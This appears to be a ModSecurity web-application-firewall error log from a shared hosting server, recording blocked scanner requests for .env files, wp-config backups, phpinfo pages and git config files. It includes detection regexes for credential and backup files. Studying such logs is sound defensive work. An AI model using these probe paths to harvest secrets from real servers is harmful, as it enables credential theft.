[Tue May 26 13:32:15.892252 2026] [security2:error] [pid 512344:tid 512407] [remote 74.7.241.58:33290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVTh8bElyei4S77DQcMyQAAST4"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/SimplePie/Cache
[Tue May 26 13:32:16.271019 2026] [security2:error] [pid 512745:tid 512872] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config.php"] [unique_id "ahVTiHKSB_s2CvZg7xN2tgABSn4"]
[Tue May 26 13:32:16.362820 2026] [security2:error] [pid 512745:tid 512767] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/aws.php"] [unique_id "ahVTiHKSB_s2CvZg7xN2wQABDxU"]
[Tue May 26 13:32:16.394917 2026] [security2:error] [pid 512745:tid 512870] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/config.inc.php"] [unique_id "ahVTiHKSB_s2CvZg7xN2wwABdnw"]
[Tue May 26 13:32:16.425662 2026] [security2:error] [pid 512745:tid 512746] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/config.php"] [unique_id "ahVTiHKSB_s2CvZg7xN2xwABWwA"]
[Tue May 26 13:32:16.464002 2026] [security2:error] [pid 512745:tid 512850] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/env.php"] [unique_id "ahVTiHKSB_s2CvZg7xN2zQABiGg"]
[Tue May 26 13:32:16.490200 2026] [security2:error] [pid 512745:tid 512748] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/module.config.php"] [unique_id "ahVTiHKSB_s2CvZg7xN20AABRgI"]
[Tue May 26 13:32:16.492751 2026] [security2:error] [pid 512745:tid 512757] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/nexmo.php"] [unique_id "ahVTiHKSB_s2CvZg7xN20QABSQs"]
[Tue May 26 13:32:16.547285 2026] [security2:error] [pid 512344:tid 512558] [client 66.249.93.198:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVThsbElyei4S77DQcMrgAAAFQ"]
[Tue May 26 13:32:16.549441 2026] [security2:error] [pid 512745:tid 512820] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/config/stripe.php"] [unique_id "ahVTiHKSB_s2CvZg7xN21QABEko"]
[Tue May 26 13:32:17.133764 2026] [security2:error] [pid 512745:tid 512844] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/info.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3HAABKGI"]
[Tue May 26 13:32:17.145827 2026] [security2:error] [pid 512745:tid 512843] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/infophp.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3HQABTmE"]
[Tue May 26 13:32:17.153317 2026] [security2:error] [pid 512745:tid 512822] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/infos.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3HgABNkw"]
[Tue May 26 13:32:17.366407 2026] [security2:error] [pid 512745:tid 512964] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTiHKSB_s2CvZg7xN3BAAAAWM"]
[Tue May 26 13:32:17.578129 2026] [security2:error] [pid 512745:tid 512786] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php-info.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3VgABPSg"]
[Tue May 26 13:32:17.586642 2026] [security2:error] [pid 512745:tid 512834] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3VwABPVg"]
[Tue May 26 13:32:17.595867 2026] [security2:error] [pid 512745:tid 512850] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/php_info.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3WAABfGg"]
[Tue May 26 13:32:17.614400 2026] [security2:error] [pid 512745:tid 512829] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/phpinfo.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3WgABblM"]
[Tue May 26 13:32:17.736854 2026] [security2:error] [pid 512745:tid 512852] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/public/phpinfo.php"] [unique_id "ahVTiXKSB_s2CvZg7xN3bwABOGo"]
[Tue May 26 13:32:18.556906 2026] [security2:error] [pid 512745:tid 512897] [client 4.228.83.111:64357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/classwithtostring.php"] [unique_id "ahVTinKSB_s2CvZg7xN30QAAASA"]
[Tue May 26 13:32:18.557021 2026] [security2:error] [pid 512745:tid 512897] [client 4.228.83.111:64357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/classwithtostring.php"] [unique_id "ahVTinKSB_s2CvZg7xN30QAAASA"]
[Tue May 26 13:32:19.033758 2026] [security2:error] [pid 512745:tid 512889] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTinKSB_s2CvZg7xN30wAAARg"]
[Tue May 26 13:32:19.722850 2026] [security2:error] [pid 512745:tid 512831] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/test.php"] [unique_id "ahVTi3KSB_s2CvZg7xN4AQABclU"]
[Tue May 26 13:32:19.808893 2026] [security2:error] [pid 512745:tid 512814] [remote 213.246.101.88:39344] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 88.101.246.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVTi3KSB_s2CvZg7xN39wABdUQ"]
[Tue May 26 13:32:20.678328 2026] [security2:error] [pid 512745:tid 512787] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php"] [unique_id "ahVTjHKSB_s2CvZg7xN4PwABeCk"]
[Tue May 26 13:32:20.795321 2026] [security2:error] [pid 512745:tid 512803] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.bak"] [unique_id "ahVTjHKSB_s2CvZg7xN4QgABgzk"]
[Tue May 26 13:32:20.797533 2026] [security2:error] [pid 512745:tid 512849] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.new"] [unique_id "ahVTjHKSB_s2CvZg7xN4QwABJWc"]
[Tue May 26 13:32:20.866474 2026] [security2:error] [pid 512745:tid 512801] [remote 45.148.10.95:3850] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "webmail.pronumbers.com.au"] [uri "/wp-config.php.old"] [unique_id "ahVTjHKSB_s2CvZg7xN4SQABHDc"]
[Tue May 26 13:32:21.198703 2026] [security2:error] [pid 512745:tid 512956] [client 45.148.10.95:7406] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVTjXKSB_s2CvZg7xN4TgAAAVs"]
[Tue May 26 13:32:21.253260 2026] [security2:error] [pid 512344:tid 512557] [client 45.148.10.95:7352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVTjcbElyei4S77DQcM_wAAAFM"]
[Tue May 26 13:32:21.323981 2026] [security2:error] [pid 512344:tid 512500] [client 45.148.10.95:7432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/*update.cgi*"] [unique_id "ahVTjcbElyei4S77DQcNAwAAABo"]
[Tue May 26 13:32:21.484663 2026] [security2:error] [pid 512344:tid 512524] [client 45.148.10.95:7394] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.docker/.env"] [unique_id "ahVTjcbElyei4S77DQcNBgAAADI"]
[Tue May 26 13:32:21.523016 2026] [security2:error] [pid 512745:tid 512947] [client 45.148.10.95:7338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.docker/laravel/app/.env"] [unique_id "ahVTjXKSB_s2CvZg7xN4YAAAAVI"]
[Tue May 26 13:32:21.548781 2026] [security2:error] [pid 512745:tid 512900] [client 45.148.10.95:7462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVTjXKSB_s2CvZg7xN4YgAAASM"]
[Tue May 26 13:32:21.593016 2026] [security2:error] [pid 512745:tid 512919] [client 45.148.10.95:7418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahVTjXKSB_s2CvZg7xN4ZAAAATY"]
[Tue May 26 13:32:21.598697 2026] [security2:error] [pid 512745:tid 512928] [client 45.148.10.95:7354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahVTjXKSB_s2CvZg7xN4ZgAAAT8"]
[Tue May 26 13:32:21.788635 2026] [security2:error] [pid 512745:tid 512998] [client 45.148.10.95:7418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahVTjXKSB_s2CvZg7xN4bQAAAYU"]
[Tue May 26 13:32:21.813877 2026] [security2:error] [pid 512745:tid 512883] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTjXKSB_s2CvZg7xN4WgAAARI"]
[Tue May 26 13:32:21.844116 2026] [security2:error] [pid 512344:tid 512482] [client 45.148.10.95:7428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/.env.php"] [unique_id "ahVTjcbElyei4S77DQcNFAAAAAg"]
[Tue May 26 13:32:22.020773 2026] [security2:error] [pid 512344:tid 512479] [client 45.148.10.95:7352] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahVTjsbElyei4S77DQcNGAAAAAU"]
[Tue May 26 13:32:22.056552 2026] [security2:error] [pid 512745:tid 512989] [client 45.148.10.95:7354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahVTjnKSB_s2CvZg7xN4eAAAAXw"]
[Tue May 26 13:32:22.202370 2026] [security2:error] [pid 512344:tid 512530] [client 45.148.10.95:7432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.git/config.bak"] [unique_id "ahVTjsbElyei4S77DQcNIgAAADg"]
[Tue May 26 13:32:22.236524 2026] [security2:error] [pid 512745:tid 512916] [client 45.148.10.95:7354] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.git/config.old"] [unique_id "ahVTjnKSB_s2CvZg7xN4ggAAATM"]
[Tue May 26 13:32:22.290644 2026] [security2:error] [pid 512344:tid 512548] [client 45.148.10.95:7368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/.git/config~"] [unique_id "ahVTjsbElyei4S77DQcNJgAAAEo"]
[Tue May 26 13:32:23.017133 2026] [security2:error] [pid 512745:tid 512973] [client 45.148.10.95:7406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.pronumbers.com.au"] [uri "/.wp-config.php.swp"] [unique_id "ahVTj3KSB_s2CvZg7xN4rAAAAWw"]
[Tue May 26 13:32:23.026264 2026] [security2:error] [pid 512344:tid 512478] [client 45.148.10.95:7432] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/ADMIN/.env"] [unique_id "ahVTj8bElyei4S77DQcNSAAAAAQ"]
[Tue May 26 13:32:23.042135 2026] [security2:error] [pid 512745:tid 512921] [client 45.148.10.95:7468] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/API/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN4rgAAATg"]
[Tue May 26 13:32:23.144118 2026] [security2:error] [pid 512344:tid 512523] [client 45.148.10.95:7368] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/APP/.env"] [unique_id "ahVTj8bElyei4S77DQcNTgAAADE"]
[Tue May 26 13:32:23.144517 2026] [security2:error] [pid 512745:tid 512881] [client 45.148.10.95:7480] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/Api/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN4swAAARA"]
[Tue May 26 13:32:23.154443 2026] [security2:error] [pid 512745:tid 512965] [client 45.148.10.95:7338] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.pronumbers.com.au"] [uri "/___proxy_subdomain_webmail/BACK/.env"] [unique_id "ahVTj3KSB_s2CvZg7xN4tAAAAWQ"]
